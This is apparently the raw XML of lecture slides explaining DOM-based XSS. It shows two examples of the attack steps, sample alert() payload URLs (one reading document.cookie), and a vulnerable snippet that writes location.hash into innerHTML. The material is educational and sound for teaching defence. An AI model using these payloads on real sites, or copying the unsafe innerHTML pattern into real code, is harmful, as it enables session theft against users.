        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="171136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0734-F4A7-B7BF-738E-8DBA794019D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="423421" y="0"/>
            <a:ext cx="10515600" cy="916920"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Steps in a DOM-Based XSS Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Example-1</a:t>
            </a:r>
            <a:endParaRPr lang="en-PK" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6783EC7D-0D9B-4A96-6A87-51A8CEBE0310}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="326404" y="605975"/>
            <a:ext cx="11721052"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kumimoji="0" lang="en-PK" altLang="en-PK" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Injection Point</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>: The attacker identifies a location where the page's JavaScript uses user-supplied input, such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> (URL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>document.referrer</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> (HTTP Referrer header)</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window.name or similar sources.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-PK"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None/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Malicious Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="18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The attacker creates a malicious link with a script in the URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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rPr>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-PK" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>hp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-PK" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-PK" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>https://example.com/#&lt;script&gt;alert('XSS')&lt;/script&gt; </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-PK" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-PK" altLang="en-PK" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-PK" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>3.  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="18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The web page contains insecure JavaScript, such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>let </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>userInput</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>document.location.hash.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>(1);</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-PK" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>('output').</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>userInput</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>; </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When the page processes the </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>#&lt;script&gt;alert('XSS')&lt;/script&gt; input, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> function inserts the script into the DOM without validation.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-PK" sz="1800"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endParaRPr kumimoji="0" lang="en-PK" altLang="en-PK"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PK" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Payload Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="18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The browser executes the script, leading to actions like:</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Displaying alerts (alert()).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Stealing sensitive data (e.g., cookies, tokens).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9897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1870E-C73B-4924-2114-FEC123DB2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A8D58-9F24-2BCC-BB5A-56167B2A3294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="423421" y="0"/>
            <a:ext cx="10515600" cy="916920"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Steps in a DOM-Based XSS Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Example-2</a:t>
            </a:r>
            <a:endParaRPr lang="en-PK" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE72F197-5A9E-7E0B-815E-F73E8C94B8EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="540863" y="670663"/>
            <a:ext cx="11340838" cy="694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sz="1600" dirty="0"/>
              <a:t>If a legitimate user visits:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-PK" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRP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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.example.site/page.html?default=CST</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-PK" sz="1600" b="1"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&lt;select&gt;</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  &lt;OPTION value=1&gt;CST&lt;/OPTION&gt;</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  &lt;OPTION value=2&gt;CET&lt;/OPTION&gt;</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&lt;/select&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Malicious Use Case</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>An attacker sends the following malicious URL:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-PK" sz="16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PK" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.example.site/page.html?default=&lt;script&gt;alert(document.cookie)&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-PK" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-PK" sz="16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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>What happens?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>default </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>parameter is extracted as</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-PK" sz="1600" b="1"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fr-FR" altLang="en-PK" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="en-PK" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="en-PK" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="en-PK" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
